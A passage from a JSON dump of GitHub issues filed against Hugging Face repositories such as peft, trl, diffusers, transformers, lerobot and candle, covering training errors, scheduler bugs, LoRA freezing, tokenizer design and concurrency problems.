key?\nChatgpt answered ctrl-key but, it's not working!\n\nThanks in advance.", "url": "https://github.com/huggingface/gym-hil/issues/27", "state": "open", "labels": [], "created_at": "2025-08-15T13:46:12Z", "updated_at": "2025-08-15T13:57:26Z", "user": "cory0619" }, { "repo": "huggingface/peft", "number": 2742, "title": "RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn", "body": "Hello, I am fine-tuning the LLaMA-2 7B model on an A100 40 GB GPU. Initially, I was getting a CUDA out-of-memory error. I tried various methods, such as reducing batch size, but none worked. Then I enabled:\n\nmodel.gradient_checkpointing_enable()\n\nAfter doing this, the OOM issue was resolved, but now I get the following error during backpropagation:\n\ntorch.autograd.backward(\n File \".../torch/autograd/__init__.py\", line 354, in backward\n _engine_run_backward(\n File \".../torch/autograd/graph.py\", line 829, in _engine_run_backward\n return Variable._execution_engine.run_backward( \nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n\nI also tried:\n\nmodel.enable_input_require_grads()\n\nbut the error still persists. I suspect the issue is related to enabling gradient checkpointing.\n\n# In model_init()\nreft_model.gradient_checkpointing_enable()\nreft_model.enable_input_require_grads()\n\nIs there something I am missing when using gradient checkpointing in this setup?", "url": "https://github.com/huggingface/peft/issues/2742", "state": "closed", "labels": [], "created_at": "2025-08-15T06:21:50Z", "updated_at": "2025-09-23T15:04:07Z", "comments": 4, "user": "Mishajain1110" }, { "repo": "huggingface/trl", "number": 3896, "title": "How to gather completions before computing rewards in GRPOTrainer", "body": "Hi, \nI found that the `reward_funcs` passed to GRPOTrainer is used per-device.\nThat is, if I set `num_generation=16`, `per_device_train_batch_size=4`, my customized reward function can only receive `4` completions.\nHowever, my customized reward function calculates rewards depending on a global view over all `16` completions for each question.\nHow can I implement this?", "url": "https://github.com/huggingface/trl/issues/3896", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-08-14T14:41:42Z", "updated_at": "2025-09-03T14:09:16Z", "user": "rubickkcibur" }, { "repo": "huggingface/peft", "number": 2738, "title": "Which base model weights are getting frozen after applying LoRA?", "body": "I have finetuned LLaVA-v1.5-7B with peft LoRA, and I have found out that after adding the LoRA adapters, all the weights are getting frozen except for the newly added LoRA layers and mm_projector weights (non-LoRA). I will be glad to know the freezing logic implemented by peft since not all the base model weights are getting frozen after applying LoRA.\nAlso, I have not added the mm_projector weights inside the module_to_save.", "url": "https://github.com/huggingface/peft/issues/2738", "state": "closed", "labels": [], "created_at": "2025-08-13T17:35:10Z", "updated_at": "2025-08-14T04:20:42Z", "comments": 1, "user": "srbh-dl" }, { "repo": "huggingface/diffusers", "number": 12136, "title": "How to use Diffusers to Convert Safetensors SDXL 1.0 to Onnx?", "body": "Hello,\n\nI'm trying to convert a safetensors checkpoint for SDXL to onnx format.\n\nI've tried Optimum already but it fails everytime.\n\nPlease help.", "url": "https://github.com/huggingface/diffusers/issues/12136", "state": "closed", "labels": [], "created_at": "2025-08-13T06:33:22Z", "updated_at": "2025-10-31T03:13:28Z", "user": "CypherpunkSamurai" }, { "repo": "huggingface/lerobot", "number": 1712, "title": "Why hasn't the pi0 model learned the ability to place something in the specified positions? Is it because the number of datasets is insufficient?", "body": "I am creating a tic-tac-toe board and using yellow and green sandbags as pieces. I have collected a dataset of \"the entire process of a robotic arm picking up yellow sandbags and placing them in nine different positions on the board\". This dataset is used to train the pi0 model to achieve autonomous playing. The collection scope includes: changes in the board scene, motor action status, visual images, and text task instructions. However, when testing the trained pi0 model by giving tasks of placing sandbags in different positions on the board, it turns out that the so101 robotic arm has a poor understanding of position information. It can grab the sandbags just like in the recorded dataset, but most of the time it cannot place them in the specified positions.", "url": "https://github.com/huggingface/lerobot/issues/1712", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-12T10:15:26Z", "updated_at": "2025-12-22T08:10:47Z", "user": "Alex-Wlog" }, { "repo": "huggingface/transformers", "number": 40089, "title": "Could not import module 'AutoTokenizer'. Are this object's requirements defined correctly?", "body": "### System Info\n\n- torch @ https://download.pytorch.org/whl/cu124/torch-2.6.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- torchaudio @ https://download.pytorch.org/whl/cu124/torchaudio-2.6.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- torchvision @ https://download.pytorch.org/whl/cu124/torchvision-0.21.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- unsloth==2025.6.12\n- unsloth_zoo==2025.6.8\n- accelerate==1.8.1\n- bitsandbytes==0.46.0\n- pydantic==2.11.7\n- pydantic_core==2.33.2\n- tokenizers==0.21.2\n- transformers==4.52.4\n- treelite==4.4.1\n- treescope==0.1.9\n- triton==3.2.0\n- trl==0.19.0\n- xformers==0.0.29.post3\n- sympy==1.13.1\n- cut-cross-entropy==25.1.1\n- Python 3.10.16\n- NVIDIA A10G (CUDA Version: 12.5)\n- Ubuntu 24.04.2 LTS\n\n### Who can help?\n\n@ArthurZucker @itazap\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoTokenizer\n\n---------------------------------------------------------------------------\nModuleNotFoundError Traceback (most recent call last)\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2045](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2044), in _LazyModule.__getattr__(self, name)\n 2044 try:\n-> 2045 module = self._get_module(self._class_to_module[name])\n 2046 value = getattr(module, name)\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2075](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2074), in _LazyModule._get_module(self, module_name)\n 2074 except Exception as e:\n-> 2075 raise e\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2073](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2072), in _LazyModule._get_module(self, module_name)\n 2072 try:\n-> 2073 return importlib.import_module(\".\" + module_name, self.__name__)\n 2074 except Exception as e:\n\nFile /usr/local/lib/python3.10/importlib/__init__.py:126, in import_module(name, package)\n 125 level += 1\n--> 126 return _bootstrap._gcd_import(name[level:], package, level)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :992, in _find_and_load_unlocked(name, import_)\n\nFile :241, in _call_with_frames_removed(f, *args, **kwds)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :1004, in _find_and_load_unlocked(name, import_)\n\nModuleNotFoundError: No module named 'transformers.models.ipynb_checkpoints'\n\nThe above exception was the direct cause of the following exception:\n\nModuleNotFoundError Traceback (most recent call last)\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2045](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2044), in _LazyModule.__getattr__(self, name)\n 2044 try:\n-> 2045 module = self._get_module(self._class_to_module[name])\n 2046 value = getattr(module, name)\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2075](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2074), in _LazyModule._get_module(self, module_name)\n 2074 except Exception as e:\n-> 2075 raise e\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2073](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2072), in _LazyModule._get_module(self, module_name)\n 2072 try:\n-> 2073 return importlib.import_module(\".\" + module_name, self.__name__)\n 2074 except Exception as e:\n\nFile /usr/local/lib/python3.10/importlib/__init__.py:126, in import_module(name, package)\n 125 level += 1\n--> 126 return _bootstrap._gcd_import(name[level:], package, level)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :1006, in _find_and_load_unlocked(name, i", "url": "https://github.com/huggingface/transformers/issues/40089", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-11T21:44:05Z", "updated_at": "2025-09-08T03:09:11Z", "comments": 3, "user": "octavianBordeanu" }, { "repo": "huggingface/candle", "number": 3052, "title": "Candle vs. PyTorch performance", "body": "I'm running https://github.com/huggingface/candle/tree/main/candle-examples/examples/llava vs. https://github.com/fpgaminer/joycaption/blob/main/scripts/batch-caption.py on a Mac m1.\n\nSeeing significant performance difference, Candle seems much slower.\nI enabled accelerate and metal features.\n\nWould love some pointers how to improve it.", "url": "https://github.com/huggingface/candle/issues/3052", "state": "open", "labels": [], "created_at": "2025-08-11T16:14:17Z", "updated_at": "2025-11-14T20:05:16Z", "comments": 8, "user": "ohaddahan" }, { "repo": "huggingface/diffusers", "number": 12124, "title": "For qwen-image training file, Maybe \"shuffle\" of dataloader should be \"False\" when custom_instance_prompts is not None and cache_latents is False?", "body": "### Describe the bug\n\nI think \"shuffle\" of dataloader should be \"False\" when custom_instance_prompts is not None and cache_latents is False. Otherwise, it will lead to errors in the correspondence between prompt embedding and image during training, and prompt will not be followed when performing the task of T2I.\n\n### Reproduction\n\nNone\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNone\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12124", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-11T13:15:21Z", "updated_at": "2025-08-30T01:57:02Z", "comments": 2, "user": "yinguoweiOvO" }, { "repo": "huggingface/diffusers", "number": 12120, "title": "How to train a lora with distilled flux model, such as flux-schnell???", "body": "**Is your feature request related to a problem? Please describe.**\nI can use flux as base model to train a lora, but it need 20 steps , it cost a lot of time , and I want to train a lora base on distill model to implement use fewer step make a better image, such as based on flux-schnell model train a lora it only need 4 steps can generate a good image !! and I can train many lora like this, only need 4 steps generated\n\n\n\n**Describe the solution you'd like.**\nI need a script , maybe it locate in examples\\dreambooth\\train_dreambooth_lora_flux_schennl.py \nI want to know to train a lora based on distilled model and get a good result ? \n\n**Describe alternatives you've considered.**\nI want to train many lora for base model( flux or flux-schnell), not only one lora , and I want to generated with fewer steps. So , I want to train loras with distilled model ... how to implment it ? I test scripts : [train_dreambooth_lora_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py) by modify based mode from flux to flux-schnell ,but the result is bad...\n\n**Additional context.**\nany other implement method is OK , ", "url": "https://github.com/huggingface/diffusers/issues/12120", "state": "open", "labels": [], "created_at": "2025-08-11T03:07:42Z", "updated_at": "2025-08-11T06:01:45Z", "user": "Johnson-yue" }, { "repo": "huggingface/diffusers", "number": 12108, "title": "Qwen Image and Chroma pipeline breaks using schedulers that enable flow matching by parameter.", "body": "### Describe the bug\n\nSeveral Schedulers support flow matching by using the prediction_type='flow_prediction\" e.g.\n\n```\npipe.scheduler = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", flow_shift=3.16, timestep_spacing='trailing', use_flow_sigmas=True)\n```\n\nHowever Chroma and Qwen Image will not work with these schedulers failing with the error\n```\nValueError: The current scheduler class 's `set_timesteps` does not support custom sigmas schedules. Please check whether you are using the correct scheduler.\n```\n\nCan we have this fixed by either changing the schedulers to have the missing attributes and use them, or by rethinking the way these pipelines handle the timesteps .\n\n### Reproduction\n\n```py\nimport torch\nfrom diffusers import QwenImagePipeline, UniPCMultistepScheduler\n\n\n\npipe = QwenImagePipeline.from_pretrained(\"Qwen/Qwen-Image\",\n torch_dtype=torch.bfloat16)\n#pipe.scheduler = FlowMatchEulerDiscreteScheduler(shift=3.16, use_beta_sigmas=True)\npipe.scheduler = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", flow_shift=3.16, timestep_spacing='trailing', use_flow_sigmas=True)\npipe.to(\"mps\")\npipe(\"a nice picture of an rainbow\")\n```\n\n### Logs\n\n```shell\nFile \"/Volumes/SSD2TB/AI/Diffusers/qwenimagelowmem.py\", line 84, in \n image = pipe(prompt_embeds=prompt_embeds, prompt_embeds_mask=prompt_embeds_mask, \n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py\", line 619, in __call__\n timesteps, num_inference_steps = retrieve_timesteps(\n ^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py\", line 119, in retrieve_timesteps\n raise ValueError(\nValueError: The current scheduler class 's `set_timesteps` does not support custom sigmas schedules. Please check whether you are using the correct scheduler.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: macOS-15.5-arm64-arm-64bit\n- Running on Google Colab?: No\n- Python version: 3.11.13\n- PyTorch version (GPU?): 2.6.0 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.3\n- Transformers version: 4.52.4\n- Accelerate version: 1.7.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: not installed\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: Apple M3\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12108", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-09T21:34:28Z", "updated_at": "2025-08-09T21:39:30Z", "comments": 0, "user": "Vargol" }, { "repo": "huggingface/transformers", "number": 40056, "title": "Question: How to write a custome tokenizer form scratch", "body": "In this guide you introduced how to write a custom model and custom model configuration: [here](https://huggingface.co/docs/transformers/main/en/custom_models), IN addition I want to create a custom tokenizer form scratch why ?\n\nI have a problem of multilevel transcription: the model takes an input utterance and output a 12 multilingual transcript simultaneously . So I want to design a tokenzier such that it take the whole 12 languages as a dict: \n\n```python\n{\n \"lang1\": \"text text\",\n \"lang2\": \"text text\", \n \"lang3\": \"text text\",\n}\n```\n\nand after tokenization\n\n\n```python\n{\n \"input_ids\": \n {\n \"lang1\": \"ids of lang 1\",\n \"lang2\": \"ids of lang 2\",\n \"lang3\": \"ids of lang 2\",\n }\n}\n```\n\n\nHow to do so as I can not find docs of building such custom tkenizer from scratch ?", "url": "https://github.com/huggingface/transformers/issues/40056", "state": "closed", "labels": [], "created_at": "2025-08-09T16:39:19Z", "updated_at": "2025-09-24T08:03:02Z", "user": "obadx" }, { "repo": "huggingface/diffusers", "number": 12107, "title": "accelerator.init_trackers error when try with a custom object such as list", "body": "### Describe the bug\n\nI set multiple prompts with nargs for argument \"--validation_prompt \" in \"train_dreambooth.py\":\n\n` parser.add_argument(\n \"--validation_prompt\",\n type=str,\n default=[\"A photo of sks dog in a bucket\", \"A sks cat wearing a coat\"],\n nargs=\"*\",\n help=\"A prompt that is used during validation to verify that the model is learning.\",\n )`\nbut an error occured at ` if accelerator.is_main_process:\n tracker_name = \"dreambooth-lora\"\n accelerator.init_trackers(tracker_name, config=vars(args))` :\n\"ValueError: value should be one of int, float, str, bool, or torch.Tensor\" \nIs it because tensorboard only support basic Python types and PyTorch tensors but not a custom object such as list?\n\nso how to visualize when has custom object such as list or argument with nargs?\n\n### Reproduction\n\nset the follow argument in \"train_dreambooth.py\" or other similar demos such as \"train_amused.py\":\n\n` parser.add_argument(\n \"--validation_prompt\",\n type=str,\n default=[\"A photo of sks dog in a bucket\", \"A sks cat wearing a coat\"],\n nargs=\"*\",\n help=\"A prompt that is used during validation to verify that the model is learning.\",\n )`\n\nerror occured at ` if accelerator.is_main_process:\n tracker_name = \"dreambooth-lora\"\n accelerator.init_trackers(tracker_name, config=vars(args))` with\n\"ValueError: value should be one of int, float, str, bool, or torch.Tensor\" \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.1\n- Transformers version: 4.52.4\n- Accelerate version: 1.8.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.4\n- Safetensors version: 0.5.3\n- xFormers version: 0.0.27.post2\n- Accelerator: NVIDIA GeForce RTX 3090, 24576 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12107", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-09T10:04:06Z", "updated_at": "2025-08-09T10:04:06Z", "comments": 0, "user": "micklexqg" }, { "repo": "huggingface/diffusers", "number": 12104, "title": "IndexError: index 0 is out of bounds for dimension 0 with size 0", "body": "### Describe the bug\n\n\nWhen I test the mit-han-lab/nunchaku-flux.1-kontext-dev model, it runs normally in a non-concurrent scenario, but throws an error when I try to run it with concurrent requests.\n\nMy GPU is a single RTX 4090D.\n\nHow can I enable multi-concurrency support on a single GPU?\n\nThank you in advance for your help.\n\n\nHere is my error message:\n\n[2025-08-08 17:14:50.242] [info] Initializing QuantizedFluxModel on device 0\n[2025-08-08 17:14:50.382] [info] Loading partial weights from pytorch\n[2025-08-08 17:14:51.445] [info] Done.\nInjecting quantized module\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:00<00:00, 99.47it/s]\nLoading pipeline components...: 57%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c | 4/7 [00:00<00:00, 28.54it/s]You set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 7/7 [00:00<00:00, 19.02it/s]\n\nGeneration `height` and `width` have been adjusted to 752 and 1360 to fit the model requirements.\nGeneration `height` and `width` have been adjusted to 880 and 1168 to fit the model requirements.\n 43%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258e | 12/28 [00:17<00:23, 1.45s/it]\n 57%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258b | 16/28 [00:18<00:13, 1.17s/it]\n\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: index 29 is out of bounds for dimension 0 with size 29\n\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: index 29 is out of bounds for dimension 0 with size 29\n\n\n\n### Reproduction\n\n```\nimport torch\nfrom diffusers import FluxKontextPipeline\nfrom diffusers.utils import load_image\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom nunchaku import NunchakuFluxTransformer2dModel\nfrom nunchaku.utils import get_precision\nimport time\n\ndef get_result(image_path,pipeline):\n time_begin = time.time()\n image = load_image(\n image_path\n ).convert(\"RGB\")\n size = image.size\n large_now = 1440\n small_now = round(1440 * (min(size)/max(size)) /32) * 32\n width,height = (large_now,small_now) \\\n if size[0]>size[1] else (small_now,large_now)\n prompt = \"Remove the watermark from the picture\"\n image = pipeline(\n image=image,\n prompt=prompt,\n guidance_scale=2.5,\n num_inference_steps=28,\n height=height,\n width=width,\n ).images[0]\n image.save(image_path[:-4]+\"_result.png\")\n\ndef nunchaku_test(concurrency,pipeline):\n\n test_images = [\"\u623f\u578b\u56fe\u6c34\u5370.jpg\", \"\u5367\u5ba4\u6c34\u5370.png\"] * concurrency\n test_images = test_images[:concurrency] \n\n overall_start = time.time()\n\n with ThreadPoolExecutor(max_workers=concurrency) as executor:\n futures = [executor.submit(get_result, img_path, pipeline) for img_path in test_images]\n\n results = []\n for future in futures:\n try:\n results.append(future.result())\n except Exception as e:\n print(f\"\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: {e}\")\n\n overall_time = time.time() - overall_start\n\n\nif __name__ == '__main__':\n\n\n transformer = NunchakuFluxTransformer2dModel.from_pretrained(\n f\"/root/autodl-tmp/nunchaku-flux.1-kontext-dev/svdq-{get_precision()}_r32-flux.1-kontext-dev.safetensors\"\n )\n\n pipeline = FluxKontextPipeline.from_pretrained(\n \"/root/autodl-tmp/FLUX.1-Kontext-dev\", transformer=transformer, torch_dtype=torch.bfloat16\n ).to(\"cuda\")\n\n nunchaku_test(pipeline,2)\n nunchaku_test(pipeline,4)\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n~/FLUX.1-Kontext-Dev-nunchaku# diffusers-cli env\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Linux-5.15.0-94-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.12.3\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.1\n- Transformers version: 4.53.0\n- Accelerate version: 1.8.1\n- PEFT version: not installed\n- Bitsandbytes version: not installed\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090 D, 24564 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12104", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-08T09:20:52Z", "updated_at": "2025-08-17T22:22:37Z", "comments": 1, "user": "liushiton" }, { "repo": "huggingface/datasets", "number": 7729, "title": "OSError: libcudart.so.11.0: cannot open shared object file: No such file or directory", "body": "> Hi is there any solution for that eror i try to install this one \npip install torch==1.12.1+cpu torchaudio==0.12.1+cpu -f https://download.pytorch.org/whl/torch_stable.html \nthis is working fine but tell me how to install pytorch version that is fit for gpu ", "url": "https://github.com/huggingface/datasets/issues/7729", "state": "open", "labels": [], "created_at": "2025-08-07T14:07:23Z", "updated_at": "2025-09-24T02:17:15Z", "comments": 1, "user": "SaleemMalikAI" }, { "repo": "huggingface/transformers", "number": 39992, "title": "[gpt-oss] Transform checkpoint from safetensors to state dict", "body": "Yesterday I was working on gpt-oss. However, loading the weights give me troubles.\n\u2028For models like Qwen, I did things like this:\n\n1. Create model on meta device\n2. FSDP2 shard it, so it can fit in memory\n3. On each GPU, it read weights from safetensors in a generator style, to save memory.\n4. Chunk the weights and copy to the FSDP\u2019s DTensor.\u2028\nGPT-oss does not apply this routine. Within `from_pretrained`, the mxfp4 quantizer somehow dequantized the weights, yet I cannot find a very clean way to utilize this capability. I have to modify the process, and initialized a CPU version of the model in the CPU memory.\n\nHow can we transform the safetensors to state dict directly?", "url": "https://github.com/huggingface/transformers/issues/39992", "state": "closed", "labels": [], "created_at": "2025-08-07T13:24:06Z", "updated_at": "2025-09-15T08:02:55Z", "comments": 1, "user": "fingertap" }, { "repo": "huggingface/diffusers", "number": 12094, "title": "[Wan2.2] pipeline_wan miss the 'shift' parameter which used by Wan2.2-A14B-diffusers.", "body": "**Firstly, I found that the quality of output using diffusers is poor**\nLater, I found that the pipeline_wan in diffusers[0.34.0] did not support two-stage processing. I noticed that the community had already updated it, so I installed diffusers[0.35.0-dev] by source code and it worked.\n\nThen I found that the scheduler in diffusers does not support the parameter \"shift\", but \"sample_shift\" is an important parameter generated by Wan2.2, which may also lead to differences from the official inference code of Wan2.2. Therefore, the video effect may still be inferior to the original inference code.\n\nhttps://github.com/Wan-Video/Wan2.2/issues/69\n\n**What I need**\nCan the community provide the UniPCMultistepScheduler and DPMSolverMultistepScheduler that support the 'shift' parameter? Or can it be adapted in pipeline_wan so that the shift parameter can be used.\n\nOr is there something wrong with my understanding? How can I correctly use the shift parameter when using diffusers?\n\nThanks!!\ncc @yiyixuxu @a-r-r-o-w \n", "url": "https://github.com/huggingface/diffusers/issues/12094", "state": "closed", "labels": [], "created_at": "2025-08-07T11:37:36Z", "updated_at": "2025-08-10T08:43:27Z", "comments": 7, "user": "yvmilir" }, { "repo": "huggingface/lerobot", "number": 1687, "title": "When using AMP to train a model, why are the saved model weights still in fp32?", "body": "\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/1687", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-06T12:42:40Z", "updated_at": "2025-08-12T08:52:00Z", "user": "Hukongtao" }, { "repo": "huggingface/diffusers", "number": 